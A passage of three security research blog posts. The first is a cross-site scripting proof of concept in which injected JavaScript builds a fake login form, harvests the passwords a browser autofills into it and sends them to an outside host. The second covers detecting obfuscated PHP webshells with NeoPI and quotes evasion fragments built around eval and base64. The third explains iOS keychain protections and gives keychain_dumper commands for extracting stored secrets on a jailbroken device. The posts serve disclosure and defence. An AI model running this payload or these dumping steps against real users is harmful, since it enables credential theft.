            request=new XMLHttpRequest();
            url = "http://btoe.ws/pwxss?username="+ex_username+"&password="+ex_password;
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility='hidden';
            window.clearInterval(inter);
        }
    }
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    inter = window.setInterval("attack()",100);
</script>

All that this code does it create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to http://boomer.neohapsis.com/pwxss and login (username:user1 password:secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert  box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While these both may be inconveniences from a usability perspective, they (inadvertantly or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use push state to trick a user into thinking that they were on the login page. https://gist.github.com/2552844

NeoPI in the Wild

By Scott Behrens

NeoPI was a project developed by myself and Ben Hagen to aid in the detection of obfuscated and encrypted webshells.  I recently came across an article about Webacoo shell and a rewrite of this php backdoor to avoid detection from NeoPI.

Webacoo’s developer used a few interesting techniques to avoid detection.  The first technique was to avoid signature based detection by using the function ‘strrev’:

$b=strrev("edoced_4"."6esab")

This bypasses our traditional based signature detection and also lends to a few other techniques to bypass signature based detection.  Another webshell surfaced after NeoPI’s release that uses similar techniques to avoid signature based detection.  Another example could be the following (as seen in https://elrincondeseth.Wordpress.com/2011/08/17/bypasseando-neopi/):

$b = 'bas'.'e64'.'_de'.'code';

We can see that just by breaking up the word, the risk of detection is highly mitigated.  As I suggested at B-Sides, signature based detection is complimentary to the tests in NeoPI but by itself, ineffective.   These methods described above completely thwart this tests effectiveness.

But one thing these techniques must do at some point is actually eval the code.  Webacoo for example uses the following:

eval($b(str_replace(" ","","a W Y o a X …SNIP

By developing a regex that looks for eval and a variable holding the global function, we can flag this file as malicious.  After running this test against a WordPress server with Webacoo’s shell, I observed the following:

 

Figure 1 – Webacoo identified as suspicious in eval test

NeoPI was able to detect the function and flagged it as malicious.  This particular type of use of eval isn’t very common and I have really only seen it used in malware.  That being said functions.php was also flagged so I imagine this test can still have many false positives and should be used to help aid in manual investigation of the files identified.

Another tweak Webacoo’s developer did was insert spaces in-between each character of a base64 encoded string.  The function str_replace() is called to replace each space before the code is base64_decoded  and eval’d.

In order to thwart this particular obfuscation technique, I went ahead and modified the entropy function to strip spaces within the data the function is analyzing. The screenshot below shows a scan against 1752 php files in WordPress and shows the entropy test results as flagging webacoo as potentially malicious. This increased NeoPI’s effectiveness at detecting webacoo.php but is more of a stopgap solution as the attacker can craft other junk characters to lower the shells entropy and index of coincidence. Some additional thought and research is needed on potentially looking for these complicated search and replace functions to determine if the data being obfuscated is malicious.

 

Figure 2 – Test results after modifying entropy code results in higher entropy of webacoo.php

The latest version of the code can be checked out at http://github.com/Neohapsis/NeoPI which includes these enhancements.

As for improving the other tests effectiveness, I am looking into the possibility of identifying base64 encodings without looking for the function name.  This technique may be helpful by building a ratio of upper and lower case characters and seeing if there is a trend with files that use obfuscation.

If anyone has interesting techniques for defeating NeoPI please respond to this post and I’ll look at adding more detection mechanisms to this tool!

“Researchers steal iPhone passwords in 6 minutes”…true…but not the whole story

By Patrick Toomey

Direct link to keychaindumper (for those that want to skip the article and get straight to the code)

So, a few weeks ago a wave of articles hit the usual sites about research that came out of the Fraunhofer Institute (yes, the MP3 folks) regrading some issues found in Apple’s Keychain service.  The vast majority of the articles, while factually accurate, didn’t quite present the full details of what the researchers found.  What the researchers actually found was more nuanced than what was reported.  But, before we get to what they actually found, let’s bring everyone up to speed on Apple’s keychain service.

Apple’s keychain service is a library/API provided by Apple that developers can use to store sensitive information on an iOS device “securely” (a similar service is provided in Mac OS X).  The idea is that instead of storing sensitive information in plaintext configuration files, developers can leverage the keychain service to have the operating system store sensitive information securely on their behalf.  We’ll get into what is meant by “securely” in a minute, but at a high level the keychain encrypts (using a unique per-device key that cannot be exported off of the device) data stored in the keychain database and attempts to restrict which applications can access the stored data.  Each application on an iOS device has a unique “application-identifier” that is cryptographically signed into the application before being submitted to the Apple App store.  The keychain service restricts which data an application can access based on this identifier.  By default, applications can only access data associated with their own application-identifier.  Apple realized this was a bit restrictive, so they also created another mechanism that can be used to share data between applications by using “keychain-access-groups”.  As an example, a developer could release two distinct applications (each with their own application-identifier) and assign each of them a shared access group.  When writing/reading data to the keychain a developer can specify which access group to use.  By default, when no access group is specified, the application will use the unique application-identifier as the access group (thus limiting access to the application itself).  Ok, so that should be all we need to know about the Keychain.  If you want to dig a little deeper Apple has a good doc here.

Ok, so we know the keychain is basically a protected storage facility that the iOS kernel delegates read/write privileges to based on the cryptographic signature of each application.  These cryptographic signatures are known as “entitlements” in iOS parlance.  Essentially, an application must have the correct entitlement to access a given item in the keychain.  So, the most obvious way to go about attacking the keychain is to figure out a way to sign fake entitlements into an application (ok, patching the kernel would be another way to go, but that is a topic for another day).  As an example, if we can sign our application with the “apple” access group then we would be able to access any keychain item stored using this access group.  Hmmm…well, it just so happens that we can do exactly that with the “ldid” tool that is available in the Cydia repositories once you Jailbreak your iOS device.  When a user Jailbreak’s their phone, the portion of the kernel responsible for validating cryptographic signatures is patched so that any signature will validate. So, ldid basically allows you to sign an application using a bogus signature. But, because it is technically signed, a Jailbroken device will honor the signature as if it were from Apple itself.

Based on the above descrption, so long as we can determine all of the access groups that were used to store items in a user’s keychain, we should be able to dump all of them, sign our own application to be a member of all of them using ldid, and then be allowed access to every single keychain item in a user’s keychain.  So, how do we go about getting a list of all the access group entitlements we will need?  Well, the kechain is nothing more than a SQLite database stored in:

/var/Keychains/keychain-2.db

And, it turns out, the access group is stored with each item that is stored in the keychain database.  We can get a complete list of these groups with the following query:

SELECT DISTINCT agrp FROM genp

Once we have a list of all the access groups we just need to create an XML file that contains all of these groups and then sign our own application with ldid.  So, I created a tool that does exactly that called keychain_dumper.  You can first get a properly formatted XML document with all the entitlements you will need by doing the following:

./keychain_dumper -e > /var/tmp/entitlements.xml

You can then sign all of these entitlments into keychain_dumper itself (please note the lack of a space between the flag and the path argument):

ldid -S/var/tmp/entitlements.xml keychain_dumper

After that, you can dump all of the entries within the keychain:

./keychain_dumper

If all of the above worked you will see numerous entries that look similar to the following:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Ok, so what does any of this have to do with what was being reported on a few weeks ago?  We basically just showed that you can in fact dump all of the keychain items using a jailbroken iOS device.  Here is where the discussion is more nuanced than what was reported.  The steps we took above will only dump the entire keychain on devices that have no PIN set or are currently unlocked.  If you set a PIN on your device, lock the device, and rerun the above steps, you will find that some keychain data items are returned, while others are not.  You will find a number of entries now look like this:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: <Not Accessible>

This fundamental point was either glossed over or simply ignored in every single article I happend to come across (I’m sure at least one person will find the article that does mention this point :-)).  This is an important point, as it completely reframes the discussion.  The way it was reported it looks like the point is to show how insecure iOS is.  In reality the point should have been to show how security is all about trading off various factors (security, convenience, etc).  This point was not lost on Apple, and the keychain allows developers to choose the appropriate level of security for their application.  Stealing a small section from the keychain document from Apple, they allow six levels of access for a given keychain item:

CFTypeRef kSecAttrAccessibleWhenUnlocked;
CFTypeRef kSecAttrAccessibleAfterFirstUnlock;
CFTypeRef kSecAttrAccessibleAlways;
CFTypeRef kSecAttrAccessibleWhenUnlockedThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAlwaysThisDeviceOnly;

The names are pretty self descriptive, but the main thing to focus in on is the “WhenUnlocked” accessibility constants.  If a developer chooses the “WhenUnlocked” constant then the keychain item is encrypted using a cryptographic key that is created using the user’s PIN as well as the per-device key mentioned above.  In other words, if a device is locked, the cryptographic key material does not exist on the phone to decrypt the related keychain item.  Thus, when the device is locked, keychain_dumper, despite having the correct entitlements, does not have the ability to access keychain items stored using the “WhenUnlocked” constant.  We won’t talk about the “ThisDeviceOnly” constant, but it is basically the most strict security constant available for a keychain item, as it prevents the items from being backed up through iTunes (see the Apple docs for more detail).

If a developer does not specify an accessibility constant, a keychain item will use “kSecAttrAccessibleWhenUnlocked”, which makes the item available only when the device is unlocked.  In other words, applications that store items in the keychain using the default security settings would not have been leaked using the approach used by Fraunhofer and/or keychain_dumper (I assume we are both just using the Keychain API as it is documented).  That said, quite a few items appear to be set with “kSecAttrAccessibleAlways”.  Such items include wireless access point passwords, MS Exchange passwords, etc.  So, what was Apple thinking; why does Apple let developers choose among all these options?  Well, let’s use some pretty typical use cases to think about it.  A user boots their phone and they expect their device to connect to their wireless access point without intervention.  I guess that requires that iOS be able to retrieve their access point’s password regardless of whether the device is locked or not.  How about MS Exchange?  Let’s say I lost my iPhone on the subway this morning.  Once I get to work I let the system administrator know and they proceed to initiate a remote wipe of my Exchange data.  Oh, right, my device would have to be able to login to the Exchange server, even when locked, for that to work.  So, Apple is left in the position of having to balance the privacy of user’s data with a number of use cases where less privacy is potentially worthwhile.  We can probably go through each keychain item and debate whether Apple chose the right accessibility constant for each service, but I think the main point still stands.

Wow…that turned out to be way longer than I thought it would be.  Anyway, if you want to grab the code for keychain_dumper to reproduce the above steps yourself you can grab the code on github.  I’ve included the source as well as a binary just in case you don’t want/have the developer tools on your machine.  Hopefully this tool will be useful for security professionals that are trying to evaluate whether an application has chosen the appropriate accessibility parameters during blackbox assessments. Oh, and if you want to read the original paper by Fraunhofer you can find that here.